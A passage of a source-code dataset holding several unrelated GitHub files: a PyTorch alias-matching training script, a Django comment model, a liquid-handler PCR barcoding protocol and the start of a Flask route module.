indices.data.cpu().numpy()\r\n for j in range(args.num_neg):\r\n ind = indices[j]\r\n word_len = neg_word_mask[ind].eq(0).long().sum().item()\r\n neg_vec = neg_alias[ind]\r\n neg_words = list()\r\n neg_word_len.append(word_len)\r\n for k in range(word_len):\r\n char_len = neg_char_mask[ind][k].eq(0).long().sum().item()\r\n neg_words.append(neg_alias[ind][k][:char_len])\r\n neg_char_len.append(char_len)\r\n neg_list.append(neg_words)\r\n \r\n x3 = torch.LongTensor(len(neg_word_len), max(neg_word_len), max(neg_char_len)).zero_()\r\n x3_word_mask = torch.ByteTensor(len(neg_word_len), max(neg_word_len)).fill_(1)\r\n x3_char_mask = torch.ByteTensor(len(neg_word_len), max(neg_word_len), max(neg_char_len)).fill_(1) \r\n\r\n for i in range(len(neg_list)):\r\n vec_neg = neg_list[i]\r\n for j, word in enumerate(vec_neg):\r\n x3[i, j, :len(word)].copy_(word)\r\n x3_char_mask[i, j, :len(word)].fill_(0)\r\n x3_word_mask[i, :len(vec_neg)].fill_(0)\r\n \r\n return x3, x3_word_mask, x3_char_mask\r\n\r\n\r\n\r\n\r\n\r\ndef evaluate(args, data_loader, model, device):\r\n model.eval()\r\n ranking = 0 \r\n num_examples = 0\r\n for idx, batch in enumerate(tqdm(data_loader)):\r\n alias1 = batch[0].to(device)\r\n alias1_word_mask = batch[1].to(device)\r\n alias1_char_mask = batch[2].to(device)\r\n alias2 = batch[3].to(device)\r\n alias2_word_mask = batch[4].to(device)\r\n alias2_char_mask = batch[5].to(device)\r\n neg_alias_list = batch[6]\r\n neg_word_mask_list = batch[7]\r\n neg_char_mask_list = batch[8]\r\n\r\n\r\n pos_scores = model(alias1, alias1_word_mask, alias1_char_mask, alias2, alias2_word_mask, alias2_char_mask)\r\n pos_scores = pos_scores.data.cpu().numpy().tolist()\r\n #input()\r\n #####TODO\r\n for i in range(len(pos_scores)):\r\n \r\n neg_alias = neg_alias_list[i].to(device)\r\n neg_word_mask = neg_word_mask_list[i].to(device)\r\n neg_char_mask = neg_char_mask_list[i].to(device)\r\n\r\n pos_word_len = alias1_word_mask[i].data.cpu().eq(0).long().sum().item()\r\n pos_char_len = alias1_char_mask[i].data.cpu().eq(0).long().sum(1).numpy().tolist()\r\n\r\n pos_alias2 = alias1[i,:pos_word_len, :max(pos_char_len)].repeat(len(neg_alias), 1, 1)\r\n pos_word_mask = alias1_word_mask[i, :pos_word_len].repeat(len(neg_alias), 1)\r\n pos_char_mask = alias1_char_mask[i, :pos_word_len, :max(pos_char_len)].repeat(len(neg_alias), 1, 1)\r\n\r\n\r\n \r\n neg_scores = model(pos_alias2, pos_word_mask, pos_char_mask, neg_alias, neg_word_mask, neg_char_mask).data.cpu().numpy().tolist()\r\n pos_score = pos_scores[i]\r\n \r\n\r\n ####MRR score compute\r\n neg_scores.append(pos_score)\r\n sorted_idx = sorted(range(len(neg_scores)), key = neg_scores.__getitem__, reverse=True)\r\n ranking = ranking + 1/ (sorted_idx.index(len(neg_scores) - 1) + 1)\r\n num_examples += 1\r\n \r\n ranking /= num_examples\r\n logger.info(\"MRR SCORE IS %.5f:\" % ranking)\r\n return ranking\r\n\r\n\r\ndef precision_recall(args, data_loader, model, device, ind2char):\r\n fp = open('ppl_pr_errors_1.txt', 'w')\r\n fp1 = open('ppl_pr_errors_0.txt', 'w')\r\n model.eval()\r\n ranking = 0 \r\n num_examples = 0\r\n recall_list = [0.95, 0.9, 0.85, 0.8, 0.75, 0.7, 0.65, 0.6, 0.55, 0.5, 0.45, 0.4, 0.35, 0.3, 0.25, 0.2, 0.15, 0.1, 0.05]\r\n pos_score_list = list()\r\n neg_score_list = list()\r\n\r\n for idx, batch in enumerate(tqdm(data_loader)):\r\n alias1 = batch[0].to(device)\r\n alias1_word_mask = batch[1].to(device)\r\n alias1_char_mask = batch[2].to(device)\r\n alias2 = batch[3].to(device)\r\n alias2_word_mask = batch[4].to(device)\r\n alias2_char_mask = batch[5].to(device)\r\n neg_alias_list = batch[6]\r\n neg_word_mask_list = batch[7]\r\n neg_char_mask_list = batch[8]\r\n\r\n\r\n pos_scores = model(alias1, alias1_word_mask, alias1_char_mask, alias2, alias2_word_mask, alias2_char_mask)\r\n pos_scores = pos_scores.data.cpu().numpy().tolist()\r\n\r\n for i in range(len(pos_scores)):\r\n \r\n neg_alias = neg_alias_list[i].to(device)\r\n neg_word_mask = neg_word_mask_list[i].to(device)\r\n neg_char_mask = neg_char_mask_list[i].to(device)\r\n\r\n pos_word_len = alias1_word_mask[i].data.cpu().eq(0).long().sum().item()\r\n pos_char_len = alias1_char_mask[i].data.cpu().eq(0).long().sum(1).numpy().tolist()\r\n\r\n pos_alias2 = alias1[i,:pos_word_len, :max(pos_char_len)].repeat(len(neg_alias), 1, 1)\r\n pos_word_mask = alias1_word_mask[i, :pos_word_len].repeat(len(neg_alias), 1)\r\n pos_char_mask = alias1_char_mask[i, :pos_word_len, :max(pos_char_len)].repeat(len(neg_alias), 1, 1)\r\n\r\n\r\n \r\n neg_scores = model(pos_alias2, pos_word_mask, pos_char_mask, neg_alias, neg_word_mask, neg_char_mask).data.cpu().numpy().tolist()\r\n pos_score = pos_scores[i]\r\n pos_score_list.append(pos_score)\r\n\r\n if pos_score < 0.247:\r\n ex = alias1[i].data.cpu()\r\n pos_ex = alias2[i].data.cpu()\r\n ch_list = list()\r\n\r\n for j, word in enumerate(ex):\r\n if batch[1][i, j].item() == 1:\r\n continue\r\n for k, ch in enumerate(word):\r\n if batch[2][i, j, k].item() == 1:\r\n continue\r\n else:\r\n ch = ch.item()\r\n if ch in ind2char:\r\n ch_list.append(ind2char[ch])\r\n else:\r\n ch_list.append(ind2char[1])\r\n ch_list.append(' ')\r\n \r\n\r\n fp1.write(''.join(ch_list[:-1]) + '\\t')\r\n\r\n ch_list = list()\r\n for j, word in enumerate(pos_ex):\r\n if batch[4][i, j].item() == 1:\r\n continue\r\n for k, ch in enumerate(word):\r\n if batch[5][i, j, k].item() == 1:\r\n continue\r\n else:\r\n ch = ch.item()\r\n if ch in ind2char:\r\n ch_list.append(ind2char[ch])\r\n else:\r\n ch_list.append(ind2char[1])\r\n ch_list.append(' ')\r\n fp1.write(''.join(ch_list[:-1]) + '\\t' + str(pos_score) + '\\t' + str('1') + '\\n')\r\n\r\n\r\n\r\n for m, v in enumerate(neg_scores):\r\n neg_score_list.append(v)\r\n if v > 6.582:\r\n ex = alias1[i].data.cpu()\r\n ch_list = list()\r\n\r\n for j, word in enumerate(ex):\r\n if batch[1][i, j].item() == 1:\r\n continue\r\n for k, ch in enumerate(word):\r\n if batch[2][i, j, k].item() == 1:\r\n continue\r\n else:\r\n ch = ch.item()\r\n if ch in ind2char:\r\n ch_list.append(ind2char[ch])\r\n else:\r\n ch_list.append(ind2char[1])\r\n ch_list.append(' ')\r\n \r\n fp.write(''.join(ch_list[:-1]) + '\\t')\r\n ch_list = list()\r\n \r\n neg_ex = neg_alias[m].data.cpu()\r\n for j, word in enumerate(neg_ex):\r\n if neg_word_mask[m, j].item() == 1:\r\n continue\r\n for k, ch in enumerate(word):\r\n if neg_char_mask[m, j, k].item() == 1:\r\n continue\r\n else:\r\n ch = ch.item()\r\n if ch in ind2char:\r\n ch_list.append(ind2char[ch])\r\n else:\r\n ch_list.append(ind2char[1])\r\n ch_list.append(' ')\r\n fp.write(''.join(ch_list[:-1]) + '\\t' + str(v) + '\\t' + str('0') + '\\n')\r\n\r\n\r\n\r\n\r\n\r\n\r\n neg_scores.append(pos_score)\r\n sorted_idx = sorted(range(len(neg_scores)), key = neg_scores.__getitem__, reverse=True)\r\n ranking = ranking + 1/ (sorted_idx.index(len(neg_scores) - 1) + 1)\r\n num_examples += 1\r\n rk = sorted_idx.index(len(neg_scores) - 1)\r\n \r\n pos_sorted_idx = sorted(range(len(pos_score_list)), key = pos_score_list.__getitem__, reverse=True)\r\n ranking = ranking /num_examples\r\n print(\"MRR SCORE IS: %.5f\" % ranking)\r\n\r\n for recall in recall_list:\r\n num_correct_labels = int(num_examples * recall)\r\n score_limit = pos_score_list[pos_sorted_idx[num_correct_labels]]\r\n\r\n ### precision\r\n lb_list = [i for i in range(len(neg_score_list)) if neg_score_list[i] >= score_limit]\r\n precision = num_correct_labels / ( len(lb_list) + num_correct_labels)\r\n print('recall is: %.2f, precision is: %.3f, score is: %.3f' %(recall, precision, score_limit))\r\n\r\n\r\n\r\n print('\\n')\r\n \r\n\r\n \r\n \r\n\r\n \r\n\r\n\r\ndef error_analysis(args, data_loader, model, device, ind2char):\r\n fp = open('people_errors.txt', 'w')\r\n model.eval()\r\n ranking = 0 \r\n num_examples = 0\r\n for idx, batch in enumerate(tqdm(data_loader)):\r\n alias1 = batch[0].to(device)\r\n alias1_word_mask = batch[1].to(device)\r\n alias1_char_mask = batch[2].to(device)\r\n alias2 = batch[3].to(device)\r\n alias2_word_mask = batch[4].to(device)\r\n alias2_char_mask = batch[5].to(device)\r\n neg_alias_list = batch[6]\r\n neg_word_mask_list = batch[7]\r\n neg_char_mask_list = batch[8]\r\n\r\n\r\n pos_scores = model(alias1, alias1_word_mask, alias1_char_mask, alias2, alias2_word_mask, alias2_char_mask)\r\n pos_scores = pos_scores.data.cpu().numpy().tolist()\r\n correct_ex = 0\r\n \r\n for i in range(len(pos_scores)):\r\n \r\n neg_alias = neg_alias_list[i].to(device)\r\n neg_word_mask = neg_word_mask_list[i].to(device)\r\n neg_char_mask = neg_char_mask_list[i].to(device)\r\n\r\n pos_word_len = alias1_word_mask[i].data.cpu().eq(0).long().sum().item()\r\n pos_char_len = alias1_char_mask[i].data.cpu().eq(0).long().sum(1).numpy().tolist()\r\n\r\n pos_alias2 = alias1[i,:pos_word_len, :max(pos_char_len)].repeat(len(neg_alias), 1, 1)\r\n pos_word_mask = alias1_word_mask[i, :pos_word_len].repeat(len(neg_alias), 1)\r\n pos_char_mask = alias1_char_mask[i, :pos_word_len, :max(pos_char_len)].repeat(len(neg_alias), 1, 1)\r\n\r\n\r\n \r\n neg_scores = model(pos_alias2, pos_word_mask, pos_char_mask, neg_alias, neg_word_mask, neg_char_mask).data.cpu().numpy().tolist()\r\n pos_score = pos_scores[i]\r\n \r\n\r\n ####MRR score compute\r\n neg_scores.append(pos_score)\r\n sorted_idx = sorted(range(len(neg_scores)), key = neg_scores.__getitem__, reverse=True)\r\n ranking = ranking + 1/ (sorted_idx.index(len(neg_scores) - 1) + 1)\r\n num_examples += 1\r\n rk = sorted_idx.index(len(neg_scores) - 1)\r\n if rk == 0 :\r\n correct_ex += 1\r\n if rk > 0:\r\n ex = alias1[i].data.cpu()\r\n pos_ex = alias2[i].data.cpu()\r\n pos_sc = pos_score\r\n\r\n #sec_rk = sorted_index[1]\r\n neg_ex = neg_alias[sorted_idx[0]].data.cpu()\r\n neg_sc = neg_scores[sorted_idx[0]]\r\n ch_list = list()\r\n\r\n for j, word in enumerate(ex):\r\n if batch[1][i, j].item() == 1:\r\n continue\r\n for k, ch in enumerate(word):\r\n if batch[2][i, j, k].item() == 1:\r\n continue\r\n else:\r\n ch = ch.item()\r\n if ch in ind2char:\r\n ch_list.append(ind2char[ch])\r\n else:\r\n ch_list.append(ind2char[1])\r\n ch_list.append(' ')\r\n \r\n\r\n fp.write(''.join(ch_list[:-1]) + '\\t')\r\n ch_list = list()\r\n for j, word in enumerate(pos_ex):\r\n if batch[4][i, j].item() == 1:\r\n continue\r\n for k, ch in enumerate(word):\r\n if batch[5][i, j, k].item() == 1:\r\n continue\r\n else:\r\n ch = ch.item()\r\n if ch in ind2char:\r\n ch_list.append(ind2char[ch])\r\n else:\r\n ch_list.append(ind2char[1])\r\n ch_list.append(' ')\r\n fp.write(''.join(ch_list[:-1]) + '\\t' + str(pos_sc) + '\\t')\r\n ch_list = list()\r\n for j, word in enumerate(neg_ex):\r\n if neg_word_mask[sorted_idx[0], j].item() == 1:\r\n continue\r\n for k, ch in enumerate(word):\r\n if neg_char_mask[sorted_idx[0], j, k].item() == 1:\r\n continue\r\n else:\r\n ch = ch.item()\r\n if ch in ind2char:\r\n ch_list.append(ind2char[ch])\r\n else:\r\n ch_list.append(ind2char[1])\r\n ch_list.append(' ')\r\n fp.write(''.join(ch_list[:-1]) + '\\t' + str(neg_sc) + '\\n')\r\n\r\n \r\n\r\n \r\n \r\n ranking /= num_examples\r\n correct_ex /= num_examples\r\n logger.info(\"MRR SCORE IS: %.5f\" % ranking)\r\n logger.info('p@1 is %.5f' % correct_ex)\r\n return ranking\r\n\r\n\r\n\r\n\r\n\r\ndef train(args, data_loader, val_train_loader, model, device, best_mrr):\r\n model.train()\r\n optimizer = torch.optim.Adamax(model.parameters())\r\n print_loss_total = 0 \r\n epoch_loss_total = 0\r\n start = time.time()\r\n check_point = 100\r\n\r\n for idx, batch in enumerate(tqdm(data_loader)):\r\n alias1 = batch[0].to(device)\r\n alias1_word_mask = batch[1].to(device)\r\n alias1_char_mask = batch[2].to(device)\r\n alias2 = batch[3].to(device)\r\n alias2_word_mask = batch[4].to(device)\r\n alias2_char_mask = batch[5].to(device)\r\n #neg_alias = batch[6].to(device)\r\n #neg_word_mask = batch[7].to(device)\r\n #neg_char_mask = batch[8].to(device)\r\n pos_score = model(alias1, alias1_word_mask, alias1_char_mask, alias2, alias2_word_mask, alias2_char_mask)\r\n pos_score = pos_score.sigmoid().log().sum()\r\n loss = pos_score\r\n \r\n\r\n for i in range(args.num_neg):\r\n neg_alias = batch[6][i].to(device)\r\n neg_word_mask = batch[7][i].to(device)\r\n neg_char_mask = batch[8][i].to(device)\r\n neg_score = model(alias1, alias1_word_mask, alias1_char_mask, neg_alias, neg_word_mask, neg_char_mask)\r\n neg_score = neg_score.neg().sigmoid().log().sum()\r\n loss = loss + neg_score\r\n \r\n\r\n \r\n ### negative sample selection\r\n #neg_alias, neg_word_mask, neg_char_mask = negative_sampling(args, model, alias1, alias1_word_mask, alias1_char_mask, neg_alias, neg_word_mask, neg_char_mask)\r\n \r\n #pos2_word_mask = alias1_word_mask.repeat(1,args.num_neg).view(-1, alias1_word_mask.size(1)).to(device)\r\n #pos2_char_mask = alias1_char_mask.view(-1, alias1_char_mask.size(1) * alias1_char_mask.size(2)).repeat(1,args.num_neg).view(-1, alias1_char_mask.size(1), alias1_char_mask.size(2)).to(device)\r\n #pos_alias2 = alias1.view(-1, alias1.size(1) * alias1.size(2)).repeat(1, args.num_neg).view(-1, alias1.size(1), alias1.size(2)).to(device)\r\n\r\n\r\n #neg_alias = neg_alias.to(device)\r\n #neg_word_mask = neg_word_mask.to(device)\r\n #neg_char_mask = neg_char_mask.to(device)\r\n #### tile operation\r\n\r\n #neg_score = model(pos_alias2, pos2_word_mask, pos2_char_mask, neg_alias, neg_word_mask, neg_char_mask)\r\n #neg_score = neg_score.neg().sigmoid().log().sum()\r\n\r\n\r\n #neg_score = model(pos_alias2, pos2_word_mask, pos2_char_mask, neg_alias, neg_word_mask, neg_char_mask)\r\n #neg_score = neg_score.neg().sigmoid().log().sum()\r\n\r\n\r\n\r\n #loss = pos_score + neg_score\r\n loss = -loss.sum() / alias1.size(0)\r\n \r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n clip_grad_norm_(model.parameters(), 5)\r\n print_loss_total += loss.data.cpu().numpy()\r\n epoch_loss_total += loss.data.cpu().numpy()\r\n \r\n if idx % check_point ==0 and idx > 0:\r\n print_loss_total = print_loss_total\r\n print_loss_avg = print_loss_total / check_point\r\n \r\n logger.info('number of steps: %d, loss: %.5f time: %.5f' % (idx, print_loss_avg, time.time()- start))\r\n print_loss_total = 0\r\n mrr_score = evaluate(args, val_train_loader, model, device) \r\n\r\n if mrr_score > best_mrr:\r\n torch.save(model, args.save_model)\r\n best_mrr = mrr_score\r\n model.train()\r\n torch.cuda.empty_cache()\r\n\r\n logger.info('epoch loss is: %.5f' % epoch_loss_total)\r\n return best_mrr\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description='Alias Similarity')\r\n parser.add_argument('--no-cuda', action='store_true', default=False)\r\n parser.add_argument('--data-workers', type=int, default=2)\r\n parser.add_argument('--train-file', type=str, default='../data/your_data.txt')\r\n parser.add_argument('--dev-file', type=str, default='../data/your_data.txt')\r\n parser.add_argument('--test-file', type=str, default='../data/your_data.txt')\r\n parser.add_argument('--batch-size', type=int, default=32)\r\n parser.add_argument('--num-epochs', type=int, default=3)\r\n parser.add_argument('--input-size', type=int, default=300)\r\n parser.add_argument('--hidden-size', type=int, default=300)\r\n parser.add_argument('--num-layers', type=int, default=2)\r\n parser.add_argument('--dropout', type=int, default=0.4)\r\n parser.add_argument('--embedding-dim', type=int, default=300)\r\n parser.add_argument('--bidirect', action='store_true', default=True)\r\n parser.add_argument('--num-neg', type=int, default=5)\r\n parser.add_argument('--resume', action='store_true', default=False)\r\n parser.add_argument('--test', action='store_true', default=False)\r\n parser.add_argument('--n-gram', type=int, default=1)\r\n parser.add_argument('--transfer', action='store_true', default=False)\r\n parser.add_argument('--base-model', type=str, default='../model/model.pt')\r\n parser.add_argument('--save-model', type=str, default='../model/hybrid.pt')\r\n parser.add_argument('--load-model', type=str, default='../model/hybrid.pt')\r\n parser.add_argument('--lowercase', action='store_true', default=False)\r\n parser.add_argument('--self-attn', action='store_true', default=True)\r\n parser.add_argument('--log-file', type=str, default = '../log/log_file.log')\r\n parser.add_argument('--pre-negscore', type=str, default=None)\r\n\r\n\r\n args = parser.parse_args()\r\n args.cuda = not args.no_cuda and torch.cuda.is_available()\r\n\r\n logger.setLevel(logging.INFO)\r\n fmt = logging.Formatter('%(asctime)s: [ %(message)s ]',\r\n '%m/%d/%Y %I:%M:%S %p')\r\n console = logging.StreamHandler()\r\n console.setFormatter(fmt)\r\n logger.addHandler(console)\r\n logfile = logging.FileHandler(args.log_file, 'a')\r\n\r\n logfile.setFormatter(fmt)\r\n logger.addHandler(logfile)\r\n\r\n train_exs = load_data_train(args.train_file, args.lowercase, args.pre_negscore)\r\n dev_exs = load_data(args.dev_file, args.lowercase)\r\n #vocab_dict = voc, char2ind, ind2char\r\n #pickle.dump(vocab_dict, open('../trained_model/vocab.pkl', 'wb'))\r\n #exit()\r\n\r\n if args.transfer:\r\n logger.info('transfer learning')\r\n voc, char2ind, ind2char = pickle.load(open('../trained_model/vocab.pkl', 'rb'))\r\n model = torch.load(args.base_model)\r\n else:\r\n voc, char2ind, ind2char = load_words(train_exs + dev_exs, args.n_gram)\r\n vocab_dict = voc, char2ind, ind2char\r\n #pickle.dump(vocab_dict, open('../trained_model/pre_trained/vocab_movie.pkl', 'wb'))\r\n #exit()\r\n model = Hybrid_Alias_Sim(args, voc)\r\n\r\n\r\n if args.resume:\r\n logger.info('use previous model')\r\n model = torch.load(args.load_model)\r\n \r\n device = torch.device(\"cuda\" if args.cuda else \"cpu\")\r\n model.to(device)\r\n #logger.info(model)\r\n\r\n if args.test:\r\n test_exs = load_data(args.test_file, args.lowercase)\r\n test_dataset = dataset_hybrid.AliasDataset(test_exs, ind2char, voc, char2ind, args.n_gram, args.num_neg)\r\n test_sampler = torch.utils.data.sampler.SequentialSampler(test_dataset)\r\n test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=args.batch_size,\r\n sampler=test_sampler, num_workers=args.data_workers,\r\n collate_fn=dataset_hybrid.val_batchify, pin_memory=args.cuda)\r\n precision_recall(args, test_loader, model, device, ind2char)\r\n #error_analysis(args, test_loader, model, device, ind2char)\r\n\r\n exit()\r\n \r\n #train_vec_rep = train_vec(train_exs, char2ind)\r\n #train_vec_rep = pickle.load(open('train_vec.pt', 'rb'))\r\n\r\n\r\n train_dataset = dataset_hybrid.AliasDataset(train_exs, ind2char, voc, char2ind, args.n_gram, args.num_neg)\r\n train_sampler = torch.utils.data.sampler.RandomSampler(train_dataset)\r\n\r\n dev_dataset = dataset_hybrid.AliasDataset(dev_exs[:1000], ind2char, voc, char2ind, args.n_gram, args.num_neg)\r\n dev_sampler = torch.utils.data.sampler.SequentialSampler(dev_dataset)\r\n dev_loader = torch.utils.data.DataLoader(dev_dataset, batch_size=args.batch_size,\r\n sampler=dev_sampler, num_workers=args.data_workers,\r\n collate_fn=dataset_hybrid.val_batchify, pin_memory=args.cuda)\r\n \r\n start_epoch = 0\r\n logger.info('start training:')\r\n best_mrr = 0\r\n \r\n for epoch in range(start_epoch, args.num_epochs):\r\n logger.info('start epoch:%d' % epoch)\r\n train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=args.batch_size,\r\n sampler=train_sampler, num_workers=args.data_workers,\r\n collate_fn=dataset_hybrid.train_batchify, pin_memory=args.cuda)\r\n best_mrr = train(args, train_loader, dev_loader, model, device, best_mrr)\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"henryzhao5852/AutoEM","sub_path":"matching/hybrid_train.py","file_name":"hybrid_train.py","file_ext":"py","file_size_in_byte":31224,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"72"} +{"seq_id":"10488938588","text":"from django.db import models\nfrom django.contrib.contenttypes.fields import GenericForeignKey\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom mptt.models import MPTTModel, TreeForeignKey\n\nfrom django.contrib.auth.models import User\nfrom account.models import Profile\n# from about.models import AboutPost\n\nclass Comment(MPTTModel):\n # about_post = models.ForeignKey(\n # AboutPost,\n # related_name='comments',\n # on_delete=models.CASCADE\n # )\n content_type = models.ForeignKey(ContentType, blank=True, null=True, on_delete=models.SET_NULL)\n object_id = models.PositiveIntegerField(blank=True, null=True)\n content_object = GenericForeignKey('content_type', 'object_id')\n commentor = models.ForeignKey(\n Profile,\n on_delete=models.PROTECT,\n null=True,\n related_name='user_comment'\n )\n parent = TreeForeignKey(\n 'self',\n on_delete=models.CASCADE,\n blank=True, null=True,\n related_name='child'\n )\n body = models.TextField()\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n active = models.BooleanField(default=True)\n users_like = models.ManyToManyField(\n User,\n related_name='comment_liked',\n blank=True\n )\n total_likes = models.PositiveIntegerField(\n db_index=True,\n default=0\n )\n \n class MPTTMeta:\n order_instertion_by = ['publish']\n\n def __str__(self):\n return self.body[:20]\n\n","repo_name":"vizvasrj/MultiAuthorBlog","sub_path":"comment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14473060021","text":"from ..Experiment import reagents, clock, logging\nfrom ..Experiment.concentration import Concentration\nfrom .QSetup import QSetup\nfrom .TRP import TRP\nfrom . import trplayout\n\nreagents.add(\"BT5310\", well=\"D1\", conc=Concentration(20, 20, \"pM\"))\nreagents.add(\"MKapa\", well='A1', conc=Concentration(2.5, 1, 'x'), extraVol=30,\n ingredients={'glycerol': 1, 'Water': 39})\nreagents.add(\"P-End\", well=\"C1\", conc=4)\n\n\nclass IDPrep(TRP):\n # Barcode multiple samples\n pcreff = 1.98\n\n def __init__(self, inputs):\n super(IDPrep, self).__init__()\n self.inputs = inputs\n\n self.qconc = 0.020 # Target qPCR concentration in nM\n self.qprimers = [\"End\"]\n\n self.bc1_inputvol = 2 # ul into PCR1\n\n used = []\n for inp in inputs:\n bc = \"%s-%s\" % (inp['left'], inp['right'])\n if bc in used:\n logging.error(\"Barcode %s is being reused for %s\" % (bc, inp['name']))\n used.append(bc)\n\n print(\"used=\",used)\n self.rsrc = [reagents.add(\"%s-%s-%s\" % (inputs[i]['name'], inputs[i]['left'], inputs[i]['right']),\n trplayout.SAMPLEPLATE,\n well=inputs[i]['well'] if 'well' in inputs[i] else None,\n conc=Concentration(stock=inputs[i]['conc'], units=\"nM\"),\n initVol=self.bc1_inputvol, extraVol=0)\n for i in range(len(inputs))]\n self.q = None # Defined in pgm()\n\n def pgm(self):\n self.q = QSetup(self, maxdil=16, debug=False, mindilvol=60)\n\n self.q.debug = True\n self.q.addReferences(dstep=10, primers=self.qprimers, ref=reagents.getsample(\"BT5310\"),nreplicates=2)\n\n print(\"### Barcoding #### (%.0f min)\" % (clock.elapsed() / 60.0))\n self.idbarcoding(self.rsrc, left=[x['left'] for x in self.inputs],\n right=[x['right'] for x in self.inputs])\n print(\"### qPCR #### (%.0f min)\" % (clock.elapsed() / 60.0))\n self.q.run(confirm=False, enzName='EvaGreen')\n\n def idbarcoding(self, rsrc, left, right):\n \"\"\"Perform barcoding of the given inputs; rsrsc,left,right should all be equal length\"\"\"\n pcrcycles = [4] # Don't need 2nd PCR since this will go directly into constriction\n #pcr1inputconc = 0.05 # PCR1 concentration final in reaction\n pcr1inputdil = 10\n pcr1vol = 30\n pcr1postdil = 100.0 / pcr1vol\n\n pcr2dil = 50\n pcr2minvol = 50.0\n\n samps = [s.getsample() for s in rsrc]\n print(\"Inputs:\")\n for i in range(len(samps)):\n print(\"%2s %-10s %8s-%-8s %.1f%s\" % (\n samps[i].plate.wellname(samps[i].well), self.inputs[i]['name'], left[i], right[i], samps[i].conc.stock,samps[i].conc.units))\n # Compute pcr1inputconc such that lowest concentration input ends up with at least 30ul after dilution\n pcr1inputconc=min([s.conc.stock*s.volume/30.0/pcr1inputdil for s in samps])\n print(\"Diluting inputs so PCR1 final template conc = %.0f pM\"%(pcr1inputconc*1000))\n wellnum = 5\n for s in left + right:\n primer = \"P-\" + s\n if not reagents.isReagent(primer):\n reagents.add(primer, conc=Concentration(2.67, 0.4, 'uM'), extraVol=30, plate=trplayout.REAGENTPLATE,\n well=trplayout.REAGENTPLATE.wellname(wellnum))\n wellnum += 1\n # Run first pass dilution where needed\n for i in range(len(samps)):\n # Dilute down to desired conc\n dil = samps[i].conc.stock / pcr1inputconc / pcr1inputdil\n dilvol = samps[i].volume * dil\n if dilvol > 100.0:\n logging.notice(\"Dilution of input %s (%.1f ul) by %.2f would require %.1f ul\" % (\n samps[i].name, samps[i].volume, dil, dilvol))\n # Do a first pass dilution into 150ul, then remove enough so second dilution can go into 100ul\n dil1 = 100.0 / samps[i].volume\n self.diluteInPlace(tgt=[samps[i]], dil=dil1)\n print(\"First pass dilution of %s by %.1f/%.1f (conc now %.3f nM)\" % (samps[i].name, dil1, dil, samps[i].conc.stock))\n dil /= dil1\n\n # Make sure they are all mixed\n self.e.shakeSamples(samps)\n\n # Final dilution\n for s in samps:\n # Dilute down to desired conc\n dil = s.conc.stock / pcr1inputconc / pcr1inputdil\n if dil < 1.0:\n logging.error(\"Input %s requires dilution of %.2f\" % (s.name, dil))\n elif dil > 1.0:\n dilvol = s.volume * dil\n if dilvol>100:\n toremove=s.volume-100.0/dil\n print(\"Removing %.1f ul from %s to allow enough room for dilution\"%(toremove,s.name))\n self.e.dispose(toremove, s)\n self.diluteInPlace(tgt=[s], dil=dil)\n print(\"Diluting %s by %.1f\" % (s.name, dil))\n\n pcr1 = self.runPCR(src=samps, srcdil=pcr1inputdil, ncycles=pcrcycles[0], vol=pcr1vol,\n primers=[[left[i], right[i]] for i in range(len(left))], usertime=0, fastCycling=False,\n inPlace=False, master=\"MKapa\", kapa=True)\n\n pcr1finalconc = pcr1inputconc * self.pcreff ** pcrcycles[0]\n print(\"PCR1 output concentration = %.3f nM\" % pcr1finalconc)\n\n if pcr1postdil > 1:\n pcr1finalconc /= pcr1postdil\n print(\"Post dilute PCR1 by %.2fx to %.3f nM \" % (pcr1postdil, pcr1finalconc))\n self.diluteInPlace(tgt=pcr1, dil=pcr1postdil)\n\n for x in pcr1:\n x.conc = Concentration(stock=pcr1finalconc, units='nM')\n\n self.q.addSamples(src=pcr1, needDil=pcr1finalconc / self.qconc, primers=self.qprimers, save=True,\n nreplicates=1)\n\n if len(pcrcycles) > 1:\n # Second PCR with 235p/236p on mixture (use at least 4ul of prior)\n pcr2 = self.runPCR(src=pcr1, srcdil=pcr2dil / pcr1postdil, vol=max(pcr2minvol, pcr2dil / pcr1postdil * 4),\n ncycles=pcrcycles[1],\n primers=\"End\", fastCycling=False, master=\"MKapa\", kapa=True)\n\n pcr2finalconc = min(200, pcr1finalconc / (pcr2dil / pcr1postdil) * self.pcreff ** pcrcycles[1])\n print(\"PCR2 final conc = %.1f nM\" % pcr2finalconc)\n\n d2 = min(4.0, 150.0 / max([p.volume for p in pcr2]))\n if d2 > 1:\n pcr2finalconc /= d2\n print(\"Post-dilute PCR2 by %.1fx to %.3fnM\" % (d2, pcr2finalconc))\n self.diluteInPlace(tgt=pcr2, dil=d2)\n self.e.shakeSamples(pcr2)\n\n for x in pcr2:\n x.conc = Concentration(stock=pcr2finalconc, units='nM')\n\n self.q.addSamples(src=pcr2, needDil=pcr2finalconc / self.qconc, primers=self.qprimers, save=True,\n nreplicates=2)\n res = pcr2\n else:\n res = pcr1\n\n return res\n","repo_name":"btownshend/pyTecan","sub_path":"TRPLib/pgmidprep.py","file_name":"pgmidprep.py","file_ext":"py","file_size_in_byte":7096,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"7689224342","text":"from . import main_blueprint\nfrom .forms import ContactForm, AddressForm, Map911Form, MapCrimeForm, MapBuildForm, ViolationsBuildForm\nfrom .utils import *\nfrom flask import render_template, redirect, url_for, current_app, abort, session\n\n\n@main_blueprint.route('/admin')\ndef admin():\n abort(500)\n\n\n@main_blueprint.route(\"/contact\", methods=[\"POST\"])\ndef contact():\n form = ContactForm()\n if form.validate_on_submit():\n sender = form.email.data\n message = form.content.data\n contact_form_email(sender, message)\n return redirect(url_for(session['page']))\n\n\n@main_blueprint.route('/address-reset')\ndef reset():\n session['address'] = ''\n return redirect(url_for('main.index'))\n\n\n@main_blueprint.route('/', methods=['GET', 'POST'])\ndef 